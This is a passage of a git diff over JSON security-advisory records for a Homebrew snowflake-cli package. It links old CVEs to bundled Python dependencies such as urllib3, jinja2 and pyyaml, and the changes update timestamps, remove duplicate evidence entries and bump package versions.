"GHSA-jwvw-v7c5-m82h", "CVE-2015-5237", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "5.29.6", - "key": "pkg:pypi/protobuf@5.29.6", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2015-8557.json b/advisories/BREW-snowflake-cli-CVE-2015-8557.json index 7c83a149972..9755fe91995 100644 --- a/advisories/BREW-snowflake-cli-CVE-2015-8557.json +++ b/advisories/BREW-snowflake-cli-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2015-8557", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2016-10745.json b/advisories/BREW-snowflake-cli-CVE-2016-10745.json index ff499f1d817..32fc5e479e4 100644 --- a/advisories/BREW-snowflake-cli-CVE-2016-10745.json +++ b/advisories/BREW-snowflake-cli-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2016-10745", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2016-9015.json b/advisories/BREW-snowflake-cli-CVE-2016-9015.json index 0f17148cb17..ecb90bfe329 100644 --- a/advisories/BREW-snowflake-cli-CVE-2016-9015.json +++ b/advisories/BREW-snowflake-cli-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2016-9015", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2017-11424.json b/advisories/BREW-snowflake-cli-CVE-2017-11424.json index 5cc4087f688..d023e473c29 100644 --- a/advisories/BREW-snowflake-cli-CVE-2017-11424.json +++ b/advisories/BREW-snowflake-cli-CVE-2017-11424.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2017-11424", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-r9jw-mwhq-wp62", "CVE-2017-11424", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2017-18342.json b/advisories/BREW-snowflake-cli-CVE-2017-18342.json index e0399add8ba..8ba78dd6526 100644 --- a/advisories/BREW-snowflake-cli-CVE-2017-18342.json +++ b/advisories/BREW-snowflake-cli-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2017-18342", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2018-1000807.json b/advisories/BREW-snowflake-cli-CVE-2018-1000807.json index eb702a7e763..0d8407d00f7 100644 --- a/advisories/BREW-snowflake-cli-CVE-2018-1000807.json +++ b/advisories/BREW-snowflake-cli-CVE-2018-1000807.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2018-1000807", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-p28m-34f6-967q", "CVE-2018-1000807", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2018-1000808.json b/advisories/BREW-snowflake-cli-CVE-2018-1000808.json index 6250739d484..df14eefc386 100644 --- a/advisories/BREW-snowflake-cli-CVE-2018-1000808.json +++ b/advisories/BREW-snowflake-cli-CVE-2018-1000808.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2018-1000808", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-2rcm-phc9-3945", "CVE-2018-1000808", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2018-18074.json b/advisories/BREW-snowflake-cli-CVE-2018-18074.json index b10e6be9cf5..84d1b2c2afc 100644 --- a/advisories/BREW-snowflake-cli-CVE-2018-18074.json +++ b/advisories/BREW-snowflake-cli-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2018-18074", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.0", - "key": "pkg:pypi/requests@2.33.0", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2018-20060.json b/advisories/BREW-snowflake-cli-CVE-2018-20060.json index 406ba3a4495..a11ea423573 100644 --- a/advisories/BREW-snowflake-cli-CVE-2018-20060.json +++ b/advisories/BREW-snowflake-cli-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2018-20060", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2018-25091.json b/advisories/BREW-snowflake-cli-CVE-2018-25091.json index 7677d52f9a0..cf257a5b038 100644 --- a/advisories/BREW-snowflake-cli-CVE-2018-25091.json +++ b/advisories/BREW-snowflake-cli-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2018-25091", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2019-10906.json b/advisories/BREW-snowflake-cli-CVE-2019-10906.json index 586db75334b..9b94b56a49c 100644 --- a/advisories/BREW-snowflake-cli-CVE-2019-10906.json +++ b/advisories/BREW-snowflake-cli-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2019-10906", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2019-11236.json b/advisories/BREW-snowflake-cli-CVE-2019-11236.json index 924315ea699..8343ef739f1 100644 --- a/advisories/BREW-snowflake-cli-CVE-2019-11236.json +++ b/advisories/BREW-snowflake-cli-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2019-11236", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2019-11324.json b/advisories/BREW-snowflake-cli-CVE-2019-11324.json index e21962c44e8..2bf811236e4 100644 --- a/advisories/BREW-snowflake-cli-CVE-2019-11324.json +++ b/advisories/BREW-snowflake-cli-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2019-11324", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2019-20477.json b/advisories/BREW-snowflake-cli-CVE-2019-20477.json index 5db495e683f..a91d40249fa 100644 --- a/advisories/BREW-snowflake-cli-CVE-2019-20477.json +++ b/advisories/BREW-snowflake-cli-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2019-20477", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2020-14343.json b/advisories/BREW-snowflake-cli-CVE-2020-14343.json index 0a28ab56c21..6ed8d19e544 100644 --- a/advisories/BREW-snowflake-cli-CVE-2020-14343.json +++ b/advisories/BREW-snowflake-cli-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2020-14343", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2020-1747.json b/advisories/BREW-snowflake-cli-CVE-2020-1747.json index 57c7ae1330e..25a12918b87 100644 --- a/advisories/BREW-snowflake-cli-CVE-2020-1747.json +++ b/advisories/BREW-snowflake-cli-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2020-1747", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2020-26137.json b/advisories/BREW-snowflake-cli-CVE-2020-26137.json index 4dac81a3569..ff5267b077f 100644 --- a/advisories/BREW-snowflake-cli-CVE-2020-26137.json +++ b/advisories/BREW-snowflake-cli-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2020-26137", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2020-28493.json b/advisories/BREW-snowflake-cli-CVE-2020-28493.json index 3c7cc7b21ef..c207d2ad202 100644 --- a/advisories/BREW-snowflake-cli-CVE-2020-28493.json +++ b/advisories/BREW-snowflake-cli-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2020-28493", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2020-7212.json b/advisories/BREW-snowflake-cli-CVE-2020-7212.json index e3e861008e7..42b3895cc87 100644 --- a/advisories/BREW-snowflake-cli-CVE-2020-7212.json +++ b/advisories/BREW-snowflake-cli-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2020-7212", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2021-20270.json b/advisories/BREW-snowflake-cli-CVE-2021-20270.json index 5767a60bf1b..d2f7311b4ff 100644 --- a/advisories/BREW-snowflake-cli-CVE-2021-20270.json +++ b/advisories/BREW-snowflake-cli-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2021-20270", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2021-27291.json b/advisories/BREW-snowflake-cli-CVE-2021-27291.json index 1c4053de75c..649627ac82c 100644 --- a/advisories/BREW-snowflake-cli-CVE-2021-27291.json +++ b/advisories/BREW-snowflake-cli-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2021-27291", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2021-28363.json b/advisories/BREW-snowflake-cli-CVE-2021-28363.json index 22ee10e0577..b3c05d66adb 100644 --- a/advisories/BREW-snowflake-cli-CVE-2021-28363.json +++ b/advisories/BREW-snowflake-cli-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2021-28363", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2021-33503.json b/advisories/BREW-snowflake-cli-CVE-2021-33503.json index 6b7c8019c37..37d9bf87238 100644 --- a/advisories/BREW-snowflake-cli-CVE-2021-33503.json +++ b/advisories/BREW-snowflake-cli-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2021-33503", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2022-1941.json b/advisories/BREW-snowflake-cli-CVE-2022-1941.json index efca69c5655..0b25f4f21fe 100644 --- a/advisories/BREW-snowflake-cli-CVE-2022-1941.json +++ b/advisories/BREW-snowflake-cli-CVE-2022-1941.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2022-1941", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-8gq9-2x98-w8hf", "CVE-2022-1941", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "5.29.6", - "key": "pkg:pypi/protobuf@5.29.6", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2022-24439.json b/advisories/BREW-snowflake-cli-CVE-2022-24439.json index 7913a9cea9a..21b139087d9 100644 --- a/advisories/BREW-snowflake-cli-CVE-2022-24439.json +++ b/advisories/BREW-snowflake-cli-CVE-2022-24439.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2022-24439", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-hcpj-qp55-gfph", "CVE-2022-24439", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.30", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2022-29217.json b/advisories/BREW-snowflake-cli-CVE-2022-29217.json index 7fadc23e852..15815df55e4 100644 --- a/advisories/BREW-snowflake-cli-CVE-2022-29217.json +++ b/advisories/BREW-snowflake-cli-CVE-2022-29217.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2022-29217", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-ffqj-6fqr-9h24", "CVE-2022-29217", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2022-40896.json b/advisories/BREW-snowflake-cli-CVE-2022-40896.json index ed9d06e6791..d6f9de4e36f 100644 --- a/advisories/BREW-snowflake-cli-CVE-2022-40896.json +++ b/advisories/BREW-snowflake-cli-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2022-40896", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2022-40897.json b/advisories/BREW-snowflake-cli-CVE-2022-40897.json index 7b89c6d062a..626259ab1f7 100644 --- a/advisories/BREW-snowflake-cli-CVE-2022-40897.json +++ b/advisories/BREW-snowflake-cli-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2022-40897", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2022-40898.json b/advisories/BREW-snowflake-cli-CVE-2022-40898.json index 7c7115c4281..06b64a4338d 100644 --- a/advisories/BREW-snowflake-cli-CVE-2022-40898.json +++ b/advisories/BREW-snowflake-cli-CVE-2022-40898.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2022-40898", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-qwmp-2cf2-g9g6", "CVE-2022-40898", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "wheel", - "subject_version": "0.48.0", - "key": "pkg:pypi/wheel@0.48.0", - "resource": "wheel" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2022-42965.json b/advisories/BREW-snowflake-cli-CVE-2022-42965.json index 6fe4c4994f6..e1a7acbaf1a 100644 --- a/advisories/BREW-snowflake-cli-CVE-2022-42965.json +++ b/advisories/BREW-snowflake-cli-CVE-2022-42965.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2022-42965", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-4r6j-fwcx-94cf", "CVE-2022-42965", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.8.2", "resource": "snowflake-connector-python", - "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.1" + "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", - "resource": "snowflake-connector-python" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", + "subject_version": "4.7.3", + "key": "pkg:pypi/snowflake-connector-python@4.7.3", "resource": "snowflake-connector-python" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2023-26302.json b/advisories/BREW-snowflake-cli-CVE-2023-26302.json index e275ea566b7..d42d036ad45 100644 --- a/advisories/BREW-snowflake-cli-CVE-2023-26302.json +++ b/advisories/BREW-snowflake-cli-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2023-26302", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2023-26303.json b/advisories/BREW-snowflake-cli-CVE-2023-26303.json index d519fb05434..0735967addb 100644 --- a/advisories/BREW-snowflake-cli-CVE-2023-26303.json +++ b/advisories/BREW-snowflake-cli-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2023-26303", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ 